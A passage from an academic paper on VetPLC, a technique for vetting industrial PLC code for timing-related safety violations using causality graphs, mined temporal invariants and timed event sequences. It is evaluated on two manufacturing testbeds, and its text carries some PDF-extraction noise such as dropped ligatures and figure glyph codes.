REP represents the trigger of rout . If any input rininREP can be mapped to a PLC output  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. Algorithm 1 Construction of Timed Event Causality Graph 1:procedure BUILD TECG( PLC,REMOTE ,IOMapping ) 2: TECG 3: T RANSFROM PREDICATES TODNF (PLC) 4:EP GETANDLINKENTRY POINTS (PLC) 5: for pin EPdo 6: DEF USEDEFCHAIN (PLC,pin ) 7: for def DEF do 8: ifISCONST (def) ISSATISFIED (pin,def )then 9: EP GETENTRY POINT (PLC,def ) 10: TECG.ADDCOMPOUND EDGES (EP,pin ) 11: end if 12: end for 13: ifIOMapping .EXISTS (pin)then 14: rout IOMapping .GET(pin) 15: TECG TECG (rout,pin ) 16: REP GETENTRY POINT (REMOTE ,rout ) 17: for rin REP do 18: ifIOMapping .EXISTS (rin)then 19: pout IOMapping .GET(rin) 20: TECG TECG (pout,rin ) 21: EP GETENTRY POINT (PLC,pout ) 22: TECG.ADDCOMPOUND EDGES (EP,pout ) 23: end if 24: end for 25: end if 26: end for 27: A DDEVENT CLASS ANDDURATION (TECG,PLC,REMOTE ) 28: return TECG 29: end procedure pout , the edge (pout,rin )will be added to TECG as well. We then trace back from pout to nd its entry point EP in PLC code, and add compounded edges from EP topout . The last step for graph construction is to annotate vertices with event classes and durations. Event classes can be explic- itly obtained from the variable declarations in PLC/CNC code or robot speci cations. The durations of all events by defaultare set to be Permanent (P). Only if we can infer the concretetime duration of an event, will we safely update its label. Tothis end, for each input event (i.e., atomic proposition), we rst discover the constant de nitions that cause the proposition to be true. Then, we discover all the negative rede nitions that lead the proposition to be false. Next, we perform intra- procedural reachability analysis from the de nitions to those rede nitions. If a reachable path is discovered, we further examine every statement along the path to see if any time-related instructions (i.e., wait) are present. If so, we extract and accumulate their constant parameters as the duration of this event. We do not handle variable parameters in this work. The implementation is further explained in Appendix B. V. D ISCOVERY OF TEMPORAL CONTEXT A. Data Collection Collecting Data Instead of Events. Ideally, we hope to directly collect event traces from ICS testbeds to identify their temporal behavior. However, this requires instrumentation of various distributed data sources, including sensors, robot I/O modules, RFID, etc. and therefore is an extremely dif cult and tedious task. On the contrary, the data trace of PLC variables is easier to obtain due to standardized communication protocols. Yet it only preserves the runtime states of these variables but does not record the events that cause the states to transition.To bridge this gap, we intend to infer the presence of events based upon value changes in data traces and thus manage toapproximate the collection of discrete physical events with the retrieval of continuous data traces. Interesting Properties. We are interested in three properties of PLC variables: name, value and timestamp. Variable name serves as the unique identi er of a variable; the instant valueof a variable re ects its current state and can be affected by speci c events; the timestamp is the system time when thevariable is being observed. Thus, we can de ne a data item d in our observation as a triple: d=(var name,value,time ). Querying Realtime Data in Recurring Operations. We collect both positive and negative data traces from running testbeds. A positive instance begins with the arrival of empty pallet and ends in the successful departure of a loaded pallet, and thus contains all the interesting stages such as robot delivery and RFID update. A negative instance does not lead to the successful stage due to multiple reasons, such as arriving pallet loaded with part, robot not ready, CNC not ready, etc.For every instance, we keep logging all the variable values overtime in order to retrieve runtime data traces. Formally, a datatraceDT is a list of data item d:DT={d 0,d1,...,d n}.I n practice, we run Cell-1 logic 20 times and collect 10 positiveand 10 negative instances, each of which takes approximately25 minutes. Thus, our dataset consists of a set of data traces and we refer to it as: DT={DT 0,DT 1,...,DT m}, where m=1 9 . We obtained 1.2 GB data in 10 hours from our testbed that runs logic code containing 35 variables. It is noteworthy that, although limited, our dataset in practice can already help reveal the necessary invariants for detecting real-world safety problems. One possible solution to increase the amount and diversity of data traces is to follow a state-of-the-art technique (i.e., code mutation [33]) and automatically produce a large quantity of positive and negative data traces to cover a majority of normal and abnormal cases. We leave the systematic trace construction as future work. B. Mining Temporal Properties Inferring Discrete Events from Data Traces. For each data trace DT iin our dataset DT, we need to rst infer the existence of events. To this end, we rst divide everyDT iinto multiple sublists {DTv0 i,DTv1 i,...,DTvk i}where items in an individual list share the same variable name. We then iterate over each sublist. If we discover a difference between values of two neighboring items d/prime landd/prime l+1,w e record a new event e=(type,time ), where the type is denoted using the new state of this variable and the time is the timestamp of d/prime l+1. For instance, if the value of variable Deliver Part rises from 0 to 1 at time 33, then we identify an event ( Deliver Part , 33); if Part AtConveyor s value drops from 1 to 0 at time 60, then we nd an event ( Part AtConveyor , 60). Eventually, we merge discovered events from all sublists and thus convert a data trace DT iinto an event trace ETi={e0,e1,...,e p}. We therefore obtain a dataset of event traces ET={ET 0,ET 1,...,ET 19}. The formal algorithm is presented as Algorithm 3 in Appendix C.  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. TABLE I: Mined Invariants Event Pair Invariant /square(Deliver Part Part AtConveyor ) [24.4s, 24.6s] /square(Update Part Process RFID IOComplete )[15s, 20s] /square(Update Part Process Update Complete ) [15s, 20s] Temporal Invariants for Events. Once we have generated event traces, we would like to uncover constant time intervals between events of different types. Such constants can re ect the operation time of speci c machines. However, in reality,due to the variation in program paths and indeterminism of mechanical, physical or chemical processes, the durations of real-world machine operations are never constant. On the other hand, due to physical and logical limits, machine actions are bounded by time constraints. Hence, our goal is to identify such soft invariants of event temporalities that fall into speci c ranges. We formally de ne temporal invariants using Timed Propositional Temporal Logic (TPTL) [26]: De nition 2. Let/epsilon1 aand/epsilon1bbe two event types. Then a temporal invariant is a property that relates /epsilon1aand/epsilon1bin both of the two following ways: /squaretx.(/epsilon1a ty.(/epsilon1b ty tx lower)): In an event trace, if an event instance of type /epsilon1aoccurs at time tx, then another of /epsilon1beventually will happen in the same trace at a later time ty, while the time difference between tyandtxis at least lower . /squaretx.(/epsilon1a ty.(/epsilon1b ty tx upper)): In an event trace, if an event instance of type /epsilon1aoccurs at time tx, then another of /epsilon1beventually will happen in the same trace at a later time ty, while the time difference between tyandtxis at most upper . As a result, a temporal invariant describes not only the order of two event types but also the lower and upper bounds of their time difference. To extract these invariants, we follow the approach in prior work (Synoptic [29] and Perfume [60]) to perform qualitative and quantitative data mining consecutively. However, unlike previous techniques that attempt to mine all possible correlations between any two events, our mining is selective and is guided by the generated TECG . Speci cally, we do not need to learn certain temporal relationships for a pair of event types if they contradict the dependencies in the graph. For example, in our motivating case, since we know the tem- poral logic /square(RFID IOComplete Update Complete ) holds, we do not further seek the possibility of whetherUpdate Complete is followed by RFID IOComplete . For all the pairwise relationships of two event types, /epsilon1aand /epsilon1b, that do not contradict those in TECG , we rst check if their qualitative temporality /square(/epsilon1a /epsilon1b) holds. This is equivalent to checking if: Follows[/epsilon1a][/epsilon1b]=Occurrence [/epsilon1a] (1) whereFollows[/epsilon1a][/epsilon1b]counts, in a trace, the number of type /epsilon1aevents followed by at least one of the type /epsilon1bevents and Occurrence [/epsilon1a]counts the number of event instances of /epsilon1a. Once we have determined the followed by relationship between two event types, we use the Perfume [60] algorithm to perform quantitative mining and extract the lower and upper bounds of time differences. In the end, we discovered 3 invariants for the motivational case as listed in Table I. Speed Recon guration of Real-world Machines. The mined bounds of soft invariants, lower and upper , re ectthe variation in program executions and production processes. However, such bounds are still associated with pre-con guredspeeds of physical machines, which often times do not reach the speci ed hard limits. To further understand the possible impact caused by speed recon guration, we need to consider absolute time bounds for these machine operations. Letjobbe the number of machine operations and v conf be the pre-con gured speed, then lower job/v conf upper . To derive the absolute lower bound for the time cost tjob,w e consider the rated motor speed vrated and thus have: ( lower vconf)/vrated job/v rated tjob. Meantime, since the minimum machine speed theoretically can be 0, the absolute maximum time to complete a task is in nity. However, in reality, for a high throughput, machinesare expected to nish jobs as quickly as possible. Thus, ideally, machines always operate at their highest speeds. Nevertheless, safety standards have been made to regulate the maximum machine speed. For instance, the American National Standards Institute (ANSI) has published ANSI RIA R15.06 [22] for Robot and Robot System Safety which recommends that robot speed should not exceed 10 in/sec (250 mm/sec) for safety- critical operations. Such recommendations can be considered as the lowest machine speeds that can guarantee ef cient and safe production. With this required safety speed, v safe,w ec a n further obtain the practical upper bound of tjob: ( lower vconf)/vrated tjob ( upper vconf)/vsafe (2) Admittedly, to incorporate hardware limits, we need to un- derstand the semantics of mined invariants in order to associatethis additional information to correct edges. We currentlyaddress this problem using human knowledge and leave theautomatic inference of event semantics as future work. With domain knowledge, we know the time for our robot to pass a part equals the time difference between Delivery Part and Part AtConveyor . Plus, our robot is running at 400mm/sec on average and its rated speed is 3300mm/sec. Thus, we can obtain an enhanced invariant for this event pair: [3s, 39.4s]. Enhancing TECG with Temporal Invariants. Extracted temporal invariants are then provided to the TECG . Note that they not only offer quantitative information to enhance the existing temporal relations in the graph but may also introduce new temporal dependencies. This is because the code we analyze represents only a partial view of the entire ICS environment and therefore does not contain all the eventrelations. As a complement, mining runtime data traces offers a holistic view of the plant and can further uncover implicit dependencies hidden from controller code. VI. S AFETY VETTING WITH TIMED EVENT SEQUENCES A. Timed Event Sequences Once we have constructed the TECG , we can generate event sequences based upon this graph. The major challenge is how to create event permutations that conform to the quantitative dependencies illustrated by TECG . Generally speaking, to encode the mined time range of an event (i.e., soft temporal invariant) into a sequence, we discretize the continuous range  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. Algorithm 2 Generation of Timed Event Sequences 1:procedure BUILD TSEQS(TECG in, ) 2: Set event GETEVENT SET(TECG in) 3: Set/prime event DISCRETIZE (Set event, ) 4:SEQ PERMUTE (Set/prime event ) 5: for SEQ SEQ do 6: for ev SEQ do 7: Path FINDALLSOLUTIONS (TECG in,ev) 8: if path Path :path SEQ.SUBSEQ(0,ev)then 9: SEQ SEQ SEQ 10: end if 11: end for 12: end for 13: returnSEQ 14: end procedure to multiple time slices and introduce a versioned event for each slice to represent its possible occurrences. To re ect the qualitative relations among events, we check every possible permutation against the graph, so as to guarantee the prereq- uisite for each event happens before its occurrence. Our algorithm B UILD TSEQS is presented in Algorithm 2. It takes two arguments. The rst one is TECG in, a reduced version ofTECG , which preserves solely the nodes that are PLC inputs. These input events are the necessary ones to exercise the PLCcode. The second argument is the discretization parameter that indicates the number of slices every time duration is divided into. On startup, our algorithm rst retrieves all theevents in the graph TECG into generate an event set Set event . Next, for any event in Set event , whose starting time is within a certain range (i.e., its incoming edge is labeled with an invariant), the range is discretized using to create multiple versioned events. We then replace the original event with a set of versioned ones. For instance, since Part AtConveyor is enabled 3 to 39.4 seconds after Deliver Part ,i ti s discretized to be a set {PACT+3,PACT+10,PACT+18, PACT+25,PACT+32,PACT+39}when is 5. Hence, we extend Set event to be a new set Set/prime event . Then, we permute all the events in Set/prime event to create sequences. Notice that in every permutation, only one versioned event from the same set can be chosen. The result of this P ERMUTE is a setSEQ containing all candidate sequences. We further check each candidate SEQto see if it contradicts the causalities indicated by TECG in, and if so, it will be discarded. To do so, we iterate over each event evin a sequence SEQ, and nd all the solutions for evon its hosting and-or graph TECG in.A solution for evis a path, from evto a top-level vertex, which includes all of its prerequisites that are required to cause evto happen. If any solution path is covered by the subsequence from the rst element of SEQ toev, we keep this candidate SEQ. Otherwise, it is removed from SEQ . Finally, we output the result SEQ as the generated timed event sequences. For our motivating example, we can create a timed sequence, 1:Pallet Sensor /squiggleright2: Part Sensor /squiggleright 3:CNC Part Ready /squiggleright4:Robot Ready /squiggleright5: Part - AtConveyor /squiggleright6:Part AtConveyor T+10/squiggleright7:RFID - IOComplete T+20, which can lead to the safety violation due to premature termination of 6:Part AtConveyor T+10. Detailed implementation can be found in Appendix D.Selection of .An a ve way for discretizing a time range is to merely consider its lower and upper bounds (i.e., = 1). Theoretically, it is suf cient to detect the possible presence oftiming-related safety violations. However, this is too coarse- grained and can only tell if an error will occur when a machine operates at its maximum or minimum speed. On the contrary, itis in fact crucial to understand the range of machine speeds that can lead to errors. Such contextual evidence can help securityinvestigators draw a better conclusion whether a logic error iscaused by attacks. For example, prior work [38] has correlated the narrowness of an error trigger with its malice. Thus, ideally, we expect to always select a larger . However, the increase in time slices also leads to the growth of total number of permutations. To understand how to strike a balance, we have an empirical study in the evaluation. Nevertheless, itis noteworthy that, while a better can provide informative evidence with lower cost, the selection of does not affect whether we can detect a safety defect. B. Safety Speci cation The event sequences that we generate can facilitate auto- mated path exploration for testing PLC code. However, the fact that we can reach an unsafe state does not necessarily mean we can automatically detect the problem. To enable automated detection, we need to further specify certain safety rules and programmatically verify them at runtime. Prior work [54] has adopted linear temporal logic (LTL) to formally de ne safety requirements for ICSs. However, at runtime, it is hard to enforce an LTL-based rule whichrequires an activity to be followed by another (e.g., over ow avoidance), because the absence of a required event during limited test time does not suggest its absence at a later time. Although, in practice, these required actions must be accomplished within a certain amount of time, LTL however is not capable of describing such temporal relations in a quantitative fashion. To address this limitation, we again use TPTL [26] to quantitatively express safety speci cations. De nition 3. LetPbe a set of atomic logical proposi- tion symbols about the system {p 1,p2,...p|A|}, e.g., sensor Pallet Sensor is on, and let =2Abe a nite alphabet composed of these propositions. Then, the set of TPTL-based Safety Requirements is inductively de ned by the grammar: :=x+c|c :=p| 1 2| 1 d 2|false| 1 2|/circlecopyrt | 1U 2|x. The grammar of TPTL is further explained in Appendix E. Table II demonstrates 5 typical classes of safety speci cations, which have been studied by previous academic work or required by OSHA (Occupational Safety and Health Admin- istration). We categorize the policies based on the root causes of industrial hazards. First, a majority of safety incidents are caused by dangerous machine-machine interactions, including machine collision, machines facing over ow or under ow due to upstream machines. Second, failure to separate humans from life-threatening machines may result in fatal accidents. Last but not least, individual machines, even without interac-  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. TABLE II: Categories of Safety Speci cations Typical Hazard Example Speci cation to Avoid Hazard Formal De nition References Collision Whenever conveyor belt starts running, a robot arm cannot come down to pick up items. /square(Conveyor Running Robot Pickup ) TSV [54] Over ow Once a pallet enters a cell, the stopper must be retracted within 30 seconds to release it. /squaretx.(Pallet ty.(Retract ty tx 30s)) Motivating Example Under ow When water puri cation starts, water level of tanks must not below L. /square(Purify Start (water level L)) Chen et al. [33] Non-Separation When the gate for robot is opened, robot must stop working. /square(Gate Open Robot On) OSHA Instr. [59] Danger Zone Upon start, the frequency of a motor in a nuclear centrifuge is between 807 and 1210 Hz. /square(Start /square(807 Hz speed 1210 Hz)) Stuxnet Dossier [36] tion with any other entities, can still result in critical damage because they operate spatially or temporally in unsafe zones. C. Trace-based V eri cation. We carry out runtime veri cation based upon execution traces of PLC code. Note that, while in our testbeds, all controllers (i.e., for PLCs, robots, CNCs) can physically operate and thus produce real events, in our simulations, we only analyze PLC code while modeling and simulating the inputs (i.e., events) from remote devices. Particularly, we rst run a PLC program repeatedly, while each time we exercise the code using an individual event sequence. To this end, we convert PLC ST programs intoC code using the MATIEC compiler [13] and then utilize aPLC simulator [14] to execute the code. To produce executiontraces, we further instrument the generated C code to dumpall instructions and variable values that originated from PLCcode. In the end, we conduct runtime veri cation for TPTL speci cations on the traces. In theory, we can follow a prior approach [32] to perform comprehensive interpretation and translation of TPTL languages. However, since our safetyspeci cations are de ned at a high level and usually straight-forward, thus, in practice, our runtime monitor only focuses on this small subset that we use to describe safety requirements. VII. E V ALUATION A. Experimental Setup To evaluate the effectiveness and ef ciency of our approach, we follow the methodology of previous studies [33], [43],[54] to test V ETPLC on different PLC programs. However, in contrast to prior work that experimented on either synthe-sized PLC code without necessary physical contexts [43] or simple, isolated logic without machine interactions (e.g., traf c lights) [54], we apply V ETPLC to real-world PLC programs that are tightly coupled with speci c scenarios involving interconnected physical devices . To further demonstrate the generality of V ETPLC, unlike Chen et al. s work [33] that focused on only one particular testbed, we hope to evaluate our system on multiple scenarios for different ICS settings. This, however, is a challenging task because it requires a deep understanding of both physical and logical domainsof real-world control systems. Nevertheless, we developed 10scenarios on two realistic testbeds, SMART and Fischertechnik , that have completely different physical compositions. The SMART testbed has been introduced in Section III. The Fis- chertechnik testbed (Figure 10) is a miniature that emulates consecutive processing of parts. It connects 4 cells and 2 push rams using multiple conveyors and sensors, while each cell consists of a PLC and a CNC machine. Interested readers can refer to Appendix F to learn more details about this testbed.Table III lists the 10 scenarios from these two testbeds. We perform causality graph generation, invariant mining, event sequence construction and safety vetting on them. Our experiments have been conducted on a test machine equipped with Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz and 16GBof physical memory. The OS is Ubuntu 16.04.4 LTS (64bit). B. Result Overview To show the effectiveness of V ETPLC, we would like to carry out comparative experiments. Unfortunately, existing work on PLC vetting, such as TSV [54] or S YMPLC [43], cannot generate event sequences to automatically analyze real- world event-driven PLC code. Nevertheless, these state-of-the- art analyzers can always be enhanced to handle event-driven code if they adopt A LLSEQS [27] to calculate all possible event permutations. Therefore, we implement an A LLSEQS- based baseline safety analyzer for the comparison purpose. We apply V ETPLC and the baseline analyzer to our 10 scenarios, and study 3 methods that create event sequences:1) the baseline (A LLSEQS), 2) using V ETPLC to generate untimed event sequences (V ETPLC-S EQS), and 3) applying VETPLC to timed sequence generation. When creating timed sequences, we select three different discretization parameters, =2( V ETPLC-TS EQS-2), =5( V ETPLC-TS EQS-5) and =1 0( V ETPLC-TS EQS-10). Figure 6 depicts the number of sequences each method creates, while Table IV demonstrates whether generated event sequences can lead to the discovery of safety violations. Further, for safety-related errors triggered by timed event sequences, the table also shows the ranges of corresponding machine speeds that can cause the problem . As shown in the table, pure ordering-based event per- mutations, A LLSEQS and V ETPLC-S EQS, cannot lead to the hidden safety violations in timing-sensitive PLC code.We do observe, from Figure 6, a dramatic decrease (up to 96%) of event permutations for V ETPLC-S EQS (green curve) compared to A LLSEQS (red curve). Although the decline of possible event sequences results in much less analysis runtime overhead, it does not affect whether a violation can be detectedin our cases. However, provided that a timing-insensitive safetyproblem can be detected by A LLSEQS,VETPLC can achieve it two orders of magnitude faster. In contrast, all the timed event sequences can result in safety problems. In fact, some of the error cases, such as conveyor over ow and frozen robots, can in fact be observed occasionally from our testbeds during daily work but cannot be easily diagnosed manually. V ETPLC not only helps uncover their root causes but also nds other, previously unknown,problems. Although the vulnerabilities detected in our work alloriginate from human mistakes, it is also possible for insidersto actively inject safety faults into PLC source code. Note that, however, V ETPLC can detect any safety violations in  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. TABLE III: Scenarios of Safety Violations # Scenario Name Testbed Description of Hazard Safety Speci cation to Avoid Hazard 1 Conveyor Over ow #1 SMART Motivating Example. See Section III /squaretx.(Pallet ty.(Retract Stopper ty tx 30s)) 2 Robot in Danger Zone SMART Robot fails to return its safe zone. /squaretx.( Safe Zone ty.(Safe Zone ty tx 60s)) 3 Conveyor Over ow #2 SMART Robot stops processing parts from conveyor due to signal con icts. /squaretx.(Pallet ty.(Retract Stopper ty tx 30s)) 4 Part-Gate Collision SMART A pallet collides with a closed gate. /square(Pallet AtGate /squareGate Open ) 5 CNC Over ow SMART CNC stops processing parts from gantry due to missing signals. /squaretx.(Part In ty.(Part Out ty tx 5m)) 6 Ram-Part Collision Fischer . A ram starts pushing when a part has not fully entered the ram. /square(Part Entering Ram Push ) 7 CNC-Part Collision Fischer . A part is passed to CNC when a preceding part is not fully discharged. /square(CNC Busy Part Arrival ) 8 Conveyor Over ow #3 Fischer . Parts are pushed to conveyor prematurely. /squaretx.(Part Arrival ty.(Part Arrival ty tx 6s)) 9 Conveyor Under ow Fischer . A conveyor belt halts operation. /squaretx.(Part Arrival ty.(Part Arrival ty tx 8.5s)) 10 Ram-Part Collision #2 Fischer . Ram1 pushes a part to unprepared Ram2. /square(Part Entering /squareRam Ready ) PLC source code, regardless of whether they are introduced by developers or malicious logic injected by insiders. In addition, we notice that a ner-grained time discretization may lead to a more precise error-triggering (speed range) con- straints. For instance, for Scenario #8, the sequences produced by V ETPLC-TS EQS-5 reveal that a push ram at speeds from 1714 to 2000 rpm can cause errors, while those of V ETPLC- TSEQS-2 only indicate that it malfunctions at the minimum speed of 1714 rpm. Some cases, such as Scenario #7, may include multiple machines with variable speeds, and thus we compute the error-triggering ranges individually. Nevertheless, the precision improvement of speed ranges comes at a price. As we discretize time into more factions, the amount of event sequences also grows signi cantly. Figure 6illustrates that, compared to A LLSEQS,V ETPLC-TS EQS-2, VETPLC-TS EQS-5 and V ETPLC-TS EQS-10 on average yield 38%, 93% and 226% of sequences, respectively. Nonetheless,the increase of time fractions does not always lead to animprovement of error ranges. The difference between TS EQS- 5 and TS EQS-10 is not as signi cant as that between TS EQS-2 and TS EQS-5. Yet the increase of permutations for TS EQS-10 is drastic. As a result, empirically, we can see that TS EQS-5 strikes a balance between ef ciency and precision. C. Case Study We perform case studies on two scenarios. The study on Scenario #2 is presented here while the study on Scenario #7is elaborated in Appendix G. Scenario Description. Scenario #2 depicts the interaction among a PLC, a robot and a CNC in Cell 2. Here, the robotcarries a part into CNC cabinet, places it on CNC table and moves out. It then pauses at a temporary position and waits for further instructions from PLC. Normally, CNC senses a part sarrival from its table and noti es the PLC of the receipt. Then, the PLC signals the robot, allowing it to return to its safe zone, while the CNC begins to process the part. Timed Event Causality Graph. Figure 7 illustrates the TECG constructed from PLC, robot and CNC (slave PLC) code. The causal relation between Deliver Part toCNC andPart Delivered indicates the request and response between PLC and robot. The duration of Part Present extracted from CNC code is 1 second. However, the controllercode cannot reveal the implicit relation between PLC sending a request to robot and CNC receiving a part, because the PLCdoes not directly send commands to the CNC. Fortunately, V ETPLC can recover this dependency via invariant mining and thus introduce a new edge Deliver Part toCNC Part AtTable , depicted by the bold line. Besides, datamining also discovers the robot delivery time, corresponding toRobot Start[0.5s,6.6s] Robot Standby . Automated Safety Vetting. TECG helps reduce the amount of possible event permutations from 13700 to 446. We furtherobtain 2366, 8846 and 29246 timed sequences for TS EQS- 2, TS EQS-5, TS EQS-10, respectively. Using these timed se- quences to exercise the PLC code, we discover a safetyviolation that the robot, running at certain speeds, cannotreturn to its safe zone. Particularly, TS EQS-5 can provide a relatively precise error-triggering range [250 mm/sec, 959mm/sec] with a relatively low time cost (8846 permutations). Root Cause. This problem is caused by event timings and thus is not revealed by ordering-based sequences. Since Part - Present only lasts for 1 second, when PLC receives Part - Delivered from the robot, the former event may have already terminated. Then, PLC will not permit the robot to move back due to missing necessary signals. Such a problem can only be observed when the robot speed falls into the discovered range. Security Implication. Our analysis results do not auto- matically infer the intent of safety violations, but they do serve as contextual evidence that can help investigators draw correct conclusions. Prior work [38] has indicated that attacks are likely to be triggered under very narrow conditions (e.g., logic bombs) to evade detection; Stuxnet [36] code injected by insiders runs only when the target system operates between 807 Hz and 1210 Hz a unique frequency range used for nuclear centrifuges. Hence, if the vulnerabilities are injected by insiders, V ETPLC must nd their narrow triggering ranges. Otherwise, we must not provide a misleading result implying the error can happen only when robot runs at very low speed [250 mm/s, 465 mm/s] or its highest speed 3300 mm/s. Instead, we must discover a precise error-trigger range, e.g., [250 mm/s, 959 mm/s] for robot speed. D. Runtime Performance It takes on average 203s to construct graphs for one scenario. The computation time is acceptable because ouranalyses are designed to be straightforward and real-world PLC code is not very complex. The runtime of trace-based veri cation is proportional to the number of testing sequences,and thus is comparable to that of A LLSEQS, while each run takes approximately 55 seconds. VIII. D ISCUSSION Scalability. Our testbeds are smaller in size, but they accurately represent certain plants that manufacture speci c products. For instance, a small-scale plant, such as an aircraft seating factory consisting of 20 CNCs, often organizes its  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. Fig. 6: No. of Event Sequences# ALLSEQS VETPLC-S EQS VETPLC-TS EQS-2 VETPLC-TS EQS-5 VETPLC-TS EQS-10 1 N N Y Robot:[ 3300 ,3300] Y Robot:[ 550,3300] Y Robot:[ 550,3300] 2 N N Y Robot:[250, 465] Y Robot:[250, 959] Y Robot:[250, 1486 ] 3 N N Y Robot:[ 465,465 ] Y Robot:[ 307,959 ] Y Robot:[ 275,1486 ] 4 N N Y Robot:[250, 467] Y Robot:[250, 399] Y Robot:[250, 467] 5 N N Y Robot:[ 3300 ,3300] Y Robot:[ 550,3300] Y Robot:[ 550,3300] 6 N N Y Ram:[1714, 1714 ] Y Ram:[1714, 2000 ] Y Ram:[1714, 2000 ] 7 N N Y CNC1:[ 3273 ,6000] Y CNC1:[ 2571 ,6000] Y CNC1:[ 2571 ,6000] CNC2:[1714, 2667 ] CNC2:[1714, 4000 ] CNC2:[1714, 4000 ] 8 N N Y Ram:[1714, 1714 ] Y Ram:[1714, 2000 ] Y Ram:[1714, 2000 ] 9 N N Y Ram:[ 2667 ,6000] Y Ram:[ 2400 ,6000] Y Ram:[ 2000 ,6000] 10 N N Y Ram:[ 2667 ,6000] Y Ram:[ 2000 ,6000] Y Ram:[ 2000 ,6000] TABLE IV: Detection Results /g3/g14/g16/g15/g23/g14/g20/g25/g7/g11/g20/g22/g25/g22/g19/g25 /g2/g6/g2 /g6/g17/g5/g9/g8/g15/g1/g18/g6/g19/g1/g5/g3/g2/g1/g7/g11/g9/g10 /g7/g11/g16/g16/g14/g22/g25/g9/g14/g18/g21/g19/g20 /g6/g17/g2/g4/g15/g1/g18/g6/g19 /g7/g11/g20/g22/g25/g9/g14/g18/g21/g19/g20 /g6/g17/g2/g4/g15/g1/g18/g6/g19/g2/g6/g2/g25/g8/g14/g11/g13/g24 /g6/g17/g2/g4/g15/g1/g18/g6/g19 /g8/g19/g12/g19/g22/g25/g8/g14/g11/g13/g24 /g6/g17/g2/g4/g15/g1/g18/g6/g19/g2/g1/g7/g11/g16/g18/g10/g6/g13 /g15/g14/g19/g13/g16/g13/g12 /g6/g17/g2/g4/g15/g1/g18/g6/g19 /g7/g11/g16/g16/g14/g22/g25/g1/g20/g20/g15/g23/g11/g16 /g6/g17/g3/g13/g11/g10 /g12/g15/g1/g18/g6/g19 /g2/g4/g2/g1/g7/g11/g9/g10 /g7/g11/g20/g22/g25/g1/g22/g10/g11/g12/g16/g14 /g7/g17/g2/g4/g15/g1/g18/g6/g19 /g7/g11/g20/g22/g25/g7/g20/g14/g21/g14/g18/g22/g6/g12/g8/g12/g13/g1/g7/g11/g9/g10 /g8/g19/g12/g19/g22/g25/g9/g22/g11/g20/g22 /g7/g17/g2/g4/g15/g1/g18/g6/g19 /g8/g19/g12/g19/g22/g25/g9/g22/g11/g18/g13/g12/g24 /g7/g17/g5/g9/g8/g15/g1/g18/g6/g19/g8/g19/g12/g19/g22/g25/g4/g19/g25/g5/g19/g17/g14 /g7/g17/g5/g9/g8/g15/g1/g18/g6/g19 /g7/g11/g20/g22/g25/g1/g22/g2/g6/g2 /g6/g17/g2/g4/g15/g1/g18 /g21/g16/g20/g14/g19/g7/g11/g20/g22/g25/g3/g14/g16/g15/g23/g14/g20/g14/g13 /g6/g17/g2/g4/g15/g1/g18/g6/g19/g9/g12/g8/g11/g10 /g4/g1/g2/g7/g5/g6/g13/g3/g8/g3/g2/g4 /g17/g1/g5/g2/g5/g17/g9 Fig. 7: A TECG of Case #2 (Robot in Danger Zone) CNCs into multiple serial cells where up to 6 parallel machines work in the same cell on the same workloads. Thus, the amount of manufacturing steps and data communication in such a factory is comparable to that of ours. We admit that once a manufacturing system is scaled up, more computationpower will be required to conduct our analysis and data mining. To address this challenge, one possible solution is to take advantage of the inherent parallelism to scale the computation. Due to the hierarchical architecture of factory oors, it is possible to divide an entire plant into multiplerelatively independent groups, each of which can be analyzedindividually. The summarized results of individual groups canbe combined to carry out an analysis of the entire factory. Speci c Challenges to PLC Code Analysis. When com- pared to analyzing programs in other domains (e.g., Androidapps, web programs), the analysis of PLC code is inherently unique due to three reasons. (a) PLC code controls multiple types of customized hardware constrained by unique phys-ical limits. (b) PLC software follows a unique programmingparadigm due to the introduction of PLC scan cycles. (c) Most importantly, PLC events are highly time-sensitive, due to the physical nature of machines. Such time sensitivity is the exactcause of certain safety problems discovered in our work. IX. R ELATED WORK Safety Veri cation of PLC Code. Many prior efforts [24], [28], [30], [31], [42], [44], [57], [58], [61], [63], [65] have been made to statically verify logic code using model checkers [15],[21]. Further efforts have also been made to conduct runtime veri cation in an online [39], [45] or of ine manner [35], [62]. More recently, symbolic execution [43], [54] has been enabled on PLC code. While TSV [54] conducted static symbolicexecution on its temporal execution graphs, SymPLC [43] leveraged OpenPLC [16] framework and Cloud9 engine [4]to conduct dynamic analysis. In contrast, V ETPLC aims to verify real-world PLC code, which is driven by events.Mining Temporal Invariants. Synoptic [29] and Per- fume [60] extracted temporal invariants from conventional system logs via data mining. Different from OS events, ICS events are created by distributed sources on the factory oor and are dif cult to obtain. Recently, ARTINALI [25] minedtemporal properties from smart meters and medical devices to enable intrusion detection. To detect anomalies in ICS, Chen et al. [33] managed to learn invariants from data traces ofa water puri cation testbed. As a comparison, V ETPLC also mines ICS invariants but addresses a different problem. Exercising Event-Driven Programs. Anand et al. [27] pro- posed to generate GUI event sequences based upon concolic testing. Mirzaei et al. [55] correlated events with their handlersfor generating Android-speci c drivers. AppIntent [67] reliedon Android lifecycle model to produce event-space constraintgraphs. Jensen et al. [46] built event sequences based uponconcolic execution and Android GUI model. kudzu [66] devel-oped a GUI explorer that randomly searches Web event space.SymJS [51] discovered Web event sequences via a feedbackdirected exploration and dynamic taint analysis. SymRT [52]performed timing analysis for real-time Java systems based upon symbolic execution and model checking. Lee et al. [48] proposed to create test sequences from Modechart speci ca- tions. In contrast, V ETPLC can automatically discover both event ordering and timing without prede ned speci cations. Event Causality. Orpheus [34] modeled program behaviors based upon CPS events, and applied these models to anomaly detection. Zhang et al. [68] detected malware via the infer- ence of triggering relations between events in network data. Compared to the prior work which studied qualitative event causalities, V ETPLC takes a step further and quantitatively recovers event timings that are critical for PLC code analysis. X. C ONCLUSION We propose V ETPLC, a novel approach to automatically produce timed event sequences for PLC code vetting. The evaluation of our prototype on two real-life ICS testbeds 